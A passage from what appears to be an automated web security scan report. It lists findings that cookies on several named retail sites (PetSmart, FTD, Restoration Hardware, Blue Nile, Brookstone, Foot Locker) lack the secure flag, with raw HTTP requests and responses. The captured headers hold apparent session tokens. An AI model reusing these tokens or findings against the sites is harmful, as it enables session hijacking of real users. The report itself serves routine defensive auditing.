Cookie: NST=2011%2D05%2D15%2020%3A43%3A37; TRACK_USER_P=31176371511204337200580613; DOTOMI_SESSION=1; CHOSEN_BANNER=2; CHOSEN_BANNER_ID=FS/$75; mbcc=AFC75D5D-C7E2-5D3D-AA90-829AA86D100E; cmTPSet=Y; fcspersistslider_click_1=1; cmRS=&t1=1305510865474&t2=1305510881356&t3=1305541986623&t4=1305510858114&lti=1305541986623&ln=&hr=javascript%3AopenLoginDialogForID%28top_welcome_login%2C%20null%2C%20null%2C%20function%28%29%20%7BupdateWelcome%28%29%7D%2C%20left%2C%20Global%20Header%2C%20Log%20In%20%2C%20true%2C%20true%29&fti=&fn=keywordSearch%3A0%3B&ac=&fd=&uer=&fu=&pi=Home&ho=rpt.footlocker.com/eluminate%3F&ci=90101910; SSLC=web%2D06; USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib; BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib; TID=5555%2D37151120432137200525561%2D0

Response

HTTP/1.1 200 OK
Server: Apache
X-UA-Compatible: IE=EmulateIE7
P3P: policyref="http://www.footlocker.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA"
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:36:41 GMT
Connection: keep-alive
Set-Cookie: SSLC=web%2D14;domain=.footlocker.com;path=/
Set-Cookie: USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib;expires=Wed, 08-May-2041 10:36:41 GMT;path=/
Set-Cookie: BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib;path=/
Set-Cookie: TID=5555%2D37151120432137200525561%2D0;expires=Sun, 14-Aug-2011 10:36:41 GMT;path=/
Content-Length: 78368


<!-- -->
<HTML xmlns:fb="http://www.facebook.com/2008/fbml">
<HEAD>
   <script type="text/javascript" src="/ns/common/coradiant/tsedge_instr-min.js"> </script>
   

<title>Foot Locker Account Sig
...[SNIP]...

9.7. https://www.petsmart.com/coreg/index.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.petsmart.com
Path:   /coreg/index.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /coreg/index.jsp?step=register HTTP/1.1
Host: www.petsmart.com
Connection: keep-alive
Referer: http://www.petsmart.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=yYyYNQQfpxN12n6YXhzXGV2xP1vJDfygpGLyGrCyZRxwh4NLZ5r0!574538188; browser_id=125602041944; __g_u=321577027175173_1_1_0_5_1305941958166_1; __utmz=113636102.1305509971.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|26E8402A85161A9C-600001A4C022CD09[CE]; __utma=113636102.773639997.1305509971.1305509971.1305509971.1; __utmc=113636102; mr_referredVisitor=0; mt.v=1.1365981912.1305509972396; s_pers=%20s_nr%3D1305510791638%7C1308102791638%3B%20s_lastvisit%3D1305541061450%7C1400149061450%3B%20gpv_p27%3DHome%2520Page%7C1305542861802%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicpet%253D%252526pid%25253DHome%25252520Page%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//www.petsmart.com/coreg/index.jsp%2525253Fstep%2525253Dregister%252526ot%25253DA%3B; __g_c=w%3A1%7Cb%3A3%7Cr%3Ahttp%24*%24//www.petsmart.com/_1___1305541061807%7Cc%3A321577027175173%7Cd%3A1%7Ca%3A1%7Ce%3A1%7Cf%3A0%7Ch%3A1%7Cg%3A1

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 16 May 2011 10:17:46 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Location: https://www.petsmart.com/checkout/index.jsp?process=home
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: JSESSIONID=5JXxNQ5K9p3LZsnG14q6zz517GQ0xcpK91crYtzNG9wMRphdmYgz!-1124203437; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 307

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://www.petsmart.com/checkout/
...[SNIP]...

9.8. https://www.restorationhardware.com/sitewide/includes/header/search.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.restorationhardware.com
Path:   /sitewide/includes/header/search.jsp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sitewide/includes/header/search.jsp HTTP/1.1
Host: www.restorationhardware.com
Connection: keep-alive
Referer: https://www.restorationhardware.com/my-account/sign-in.jsp?link=topnav_signin
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; __utmz=108701569.1305509985.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); promobanner=viewed; TS1c138a=5027a1be02767df2db70577946ccc3192efa223a5124b4964dd0899e; __utma=108701569.1225998754.1305509985.1305509985.1305509985.1; __utmc=108701569; __utmb=108701569.3.10.1305509985; fsr.s={"v":1,"rid":"1305509997099_983249","pv":2,"to":5,"c":"http://www.restorationhardware.com/","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1305511158757,"cp":{"my-account":"visited"}}; engagement=4; fsr.a=1305511197072

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yIFsgRFBTTGljZW5zZS8wIEIyQ0xpY2Vuc2UvMCAgXQ==
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 02:10:21 GMT
Connection: keep-alive
Set-Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; Path=/
Set-Cookie: TS1c138a=f0a5fd2add35545830b6a4f9fdab0b712efa223a5124b4964dd08c35; Path=/
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 02:10:20 GMT
Content-Length: 1134

<script type="text/javascript" charset="utf-8">
                   typeAhead('#search-input-field',5);
               </script>
           <form action="/search/results.jsp" class="hasrequired header-search" method="get"><input value
...[SNIP]...

9.9. https://ordering.ftd.com/reminder-signin/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ordering.ftd.com
Path:   /reminder-signin/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /reminder-signin/ HTTP/1.1
Host: ordering.ftd.com
Connection: keep-alive
Referer: https://ordering.ftd.com/new-signup/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; track_id=bfa25c84bebbf15e8bc91502042c4463801bcd004d6700fcd6f4be1dbe08dc9c; pc1=%7b%7d; markcode=528; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Sweet%20Shop%5C%22%2C%5C%22type%5C%22%3A%5C%22index%5C%22%2C%5C%22value%5C%22%3A%5C%22%252Fsweet-shop-ctg%252Fproduct-sweet-shop%252F%253Fmarkcode%253D528%5C%22%2C%5C%22prevName%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22prevType%5C%22%3A%5C%22home%5C%22%2C%5C%22prevValue%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; v_id=11503077676663641757469614643386; s_id=51933897653166366864628919699136; s_cc=true; last_active=1305541288018; mbcs=837A23D2-E1A6-55BC-B51D-1B2EBC885D29; auto_signed_out=; s_sq=ftdprod%3D%2526pid%253DCategory%25253Aproduct_sweet_shop%2526pidt%253D1%2526oid%253Dhttps%25253A//ordering.ftd.com/528/signin/%252523forgot-password%2526ot%253DA; fsr.a=1305541789414

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:39:19 GMT
Server: Apache
Set-Cookie: auto_signed_out=; expires=Sat, 03 Jan 1970 05:00:02 GMT; path=/
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Pragma: no-cache
Cache-Control: no-cache, private, no-store, max-age=0
Expires: Mon, 16 May 2011 10:39:20 GMT
Set-Cookie: pc1=%7b%7d; domain=.ftd.com; path=/; expires=Thu, 01 Jan 2099 05:00:00 GMT
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 98257


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...

9.10. https://ordering.ftd.com/signin/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ordering.ftd.com
Path:   /signin/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /signin/ HTTP/1.1
Host: ordering.ftd.com
Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; markcode=528; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; v_id=11503077676663641757469614643386; s_id=22359894871736752832630692038142; s_cc=true; last_active=1305510812803; mbcs=129049F1-9E12-5C65-0540-FAB5539F48D0; auto_signed_out=; s_sq=ftdprod%3D%2526pid%253DHome%252520Page%2526pidt%253D1%2526oid%253Dhttps%25253A//ordering.ftd.com/528/signin/%252523forgot-password%2526ot%253DA; fsr.a=1305511186703

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:09:59 GMT
Server: Apache
Set-Cookie: track_id=baabe59f09870e0c5f1e6606009b9fb7e5a425b7fc231e55d6f4be1dbe08dc9c; expires=Thu, 13 May 2021 02:09:59 GMT; path=/; domain=.ftd.com
Set-Cookie: auto_signed_out=; expires=Sat, 03 Jan 1970 05:00:02 GMT; path=/
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Pragma: no-cache
Cache-Control: no-cache, private, no-store, max-age=0
Expires: Mon, 16 May 2011 02:09:59 GMT
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 113972


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...

9.11. https://ordering.ftd.com/signin/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ordering.ftd.com
Path:   /signin/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /signin/ HTTP/1.1
Host: ordering.ftd.com
Connection: keep-alive
Referer: https://ordering.ftd.com/signin/
Cache-Control: max-age=0
Origin: https://ordering.ftd.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; markcode=528; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; v_id=11503077676663641757469614643386; s_cc=true; last_active=1305510812803; auto_signed_out=; s_sq=ftdprod%3D%2526pid%253DHome%252520Page%2526pidt%253D1%2526oid%253Dhttps%25253A//ordering.ftd.com/528/signin/%252523forgot-password%2526ot%253DA; fsr.a=1305511191739; track_id=bfa25c84bebbf15e8bc91502042c4463801bcd004d6700fcd6f4be1dbe08dc9c
Content-Length: 120

AID=myaccount_signin&website_id=528&reminder_service=&new=&email_isvalid=0&submitted=1&email=&password=&x=22&y=9&source=

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:28:24 GMT
Server: Apache
Set-Cookie: auto_signed_out=0; expires=Sun, 15 May 2011 10:28:25 GMT; path=/; domain=.ftd.com
Set-Cookie: create_account_from_toolbar=0; expires=Sun, 15 May 2011 10:28:25 GMT; path=/; domain=.ftd.com
Set-Cookie: auto_signed_out=; expires=Sat, 03 Jan 1970 05:00:02 GMT; path=/
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: pc1=%7b%7d; domain=.ftd.com; path=/; expires=Thu, 01 Jan 2099 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, private, no-store, max-age=0
Expires: Mon, 16 May 2011 10:28:25 GMT
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 114156


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...

9.12. https://secure.bluenile.com/accounts/account-sign-in.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.bluenile.com
Path:   /accounts/account-sign-in.html

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /accounts/account-sign-in.html HTTP/1.1
Host: secure.bluenile.com
Connection: keep-alive
Referer: http://www.bluenile.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; __utmz=1.1305510928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.637722072.1305510928.1305510928.1305510928.1; __utmc=1; __utmb=1.1.10.1305510928; testcookie=; sitetrack=jse~1; stc=3NZR3Q; bnper=ver~3&NIB~0&CURR~USD&CURR_SYM~%24&CONTEXT-NAME~53&DM~-&SUB~false; bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~0&mbpop~false; pop=sweeps~1

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:06:37 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
Set-Cookie: JSESSIONID=C4A385CE7874D0A2B551FC74E3744D04; Path=/; Secure
Set-Cookie: bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~1&mbpop~false; Domain=.bluenile.com; Path=/
Set-Cookie: stc=3NZR3Q; Domain=.bluenile.com; Expires=Sat, 12-Nov-2011 02:06:40 GMT; Path=/
Set-Cookie: SID=""; Domain=.bluenile.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bncust=ver~1&SignInURL~http%3A%2F%2Fwww.bluenile.com%2F; Domain=.bluenile.com; Expires=Tue, 15-May-2012 02:06:40 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 63219


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Your
...[SNIP]...

9.13. https://www.brookstone.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.brookstone.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.brookstone.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E841FF051D3756-4000010C200DDEB1[CE]; JSESSIONID=B4E0235D8822C4DE7BE6C831C54E4E62; TS657dfa=f5d54e710c8ae3d5dcd77d6f57bcade2e754034066e5db8e4dd0fb6760ac0ec56e0e0800; s_pers=%20s_nr%3D1305511115723%7C1368583115723%3B%20s_lv%3D1305511115727%7C1400119115727%3B%20s_lv_s%3DFirst%2520Visit%7C1305512915727%3B%20s_vs%3D1%7C1305543325583%3B; s_sess=%20s_evar2%3Dsubcategorylandingpage_home_beanbag_chairs_kids%257Cc1topproducts1fdt%257C11370241%3B%20s_cc%3Dtrue%3B%20ttc%3D1305541525579%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
ETag: W/"52413-1280871734000"
Last-Modified: Tue, 03 Aug 2010 21:42:14 GMT
Content-Type: image/x-icon
Content-Length: 52413
Date: Mon, 16 May 2011 10:36:08 GMT
Set-Cookie: TS657dfa=0b3c2fa6061f93d60514f85a08946e42e754034066e5db8e4dd0fe1860ac0ec56e0e0800; Path=/

..............h.......(....... ...............................00/.EED.............""!.....**).++*.HHH.997.221.443.............]]\.....            .....%%$.....##".RRQ.gff.''%...........-.................III...
...[SNIP]...

9.14. https://www.brookstone.com/formhandlerservlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.brookstone.com
Path:   /formhandlerservlet

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /formhandlerservlet?currentNodeLink=/shoppingCart.jsp&formName=updateCart_checkout HTTP/1.1
Host: www.brookstone.com
Connection: keep-alive
Referer: http://www.brookstone.com/shoppingCart.jsp.vr
Cache-Control: max-age=0
Origin: http://www.brookstone.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E841FF051D3756-4000010C200DDEB1[CE]; JSESSIONID=B4E0235D8822C4DE7BE6C831C54E4E62; TS657dfa=f5d54e710c8ae3d5dcd77d6f57bcade2e754034066e5db8e4dd0fb6760ac0ec56e0e0800; s_pers=%20s_nr%3D1305511115723%7C1368583115723%3B%20s_lv%3D1305511115727%7C1400119115727%3B%20s_lv_s%3DFirst%2520Visit%7C1305512915727%3B%20s_vs%3D1%7C1305543312191%3B; s_sess=%20s_evar2%3Dsubcategorylandingpage_home_beanbag_chairs_kids%257Cc1topproducts1fdt%257C11370241%3B%20s_cc%3Dtrue%3B%20s_sq%3Dbstoneprod%253D%252526pid%25253Dcheckout%2525253Acart%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.brookstone.com/shoppingCart.jsp.vr%25252523_4%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B
Content-Length: 21

quantity_1343815425=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, pre-check=0, post-check=0, private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:36:05 GMT
Set-Cookie: TS657dfa=2eff89a1b2ef875f19c572c08f6b8043e754034066e5db8e4dd0fe1660ac0ec56e0e0800; Path=/
Content-Length: 92549


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="EN">
<!-- Generated by
...[SNIP]...

9.15. https://www.restorationhardware.com/my-account/forgot-password.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.restorationhardware.com
Path:   /my-account/forgot-password.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /my-account/forgot-password.jsp HTTP/1.1
Host: www.restorationhardware.com
Connection: keep-alive
Referer: https://www.restorationhardware.com/my-account/sign-in.jsp?link=topnav_signin
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; __utmz=108701569.1305509985.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); promobanner=viewed; TS1c138a=5027a1be02767df2db70577946ccc3192efa223a5124b4964dd0899e; __utma=108701569.1225998754.1305509985.1305509985.1305509985.1; __utmc=108701569; engagement=4; fsr.s={"v":1,"rid":"1305509997099_983249","pv":3,"to":5,"c":"https://www.restorationhardware.com/my-account/sign-in.jsp","lc":{"d0":{"v":3,"s":false,"e":1}},"cd":0,"sd":0,"f":1305511158757,"cp":{"my-account":"visited"}}; cmRS=&t1=1305511192547&t2=1305511197283&t3=1305541160118&fti=&fn=UNDEFINED%3A0%3B&ac=&fd=&uer=&fu=&pi=my-account%20sign-in&ho=cimg-1.restorationhardware.com/cm%3F&ci=90007517&ul=https%3A//www.restorationhardware.com&rf=http%3A//www.restorationhardware.com/content/promo.jsp%3Fid%3D138040%26%26link%3DSFGalleryStore

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yIFsgRFBTTGljZW5zZS8wIEIyQ0xpY2Vuc2UvMCAgXQ==
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:24:01 GMT
Connection: keep-alive
Set-Cookie: TS1c138a=b72ce5406b61a765c4dbe2b4990160aa2efa223a5124b4964dd0ffea; Path=/
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 10:24:00 GMT
Content-Length: 17767

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">    
       <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
           <hea
...[SNIP]...

9.16. https://www.restorationhardware.com/my-account/register.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.restorationhardware.com
Path:   /my-account/register.jsp

Issue detail

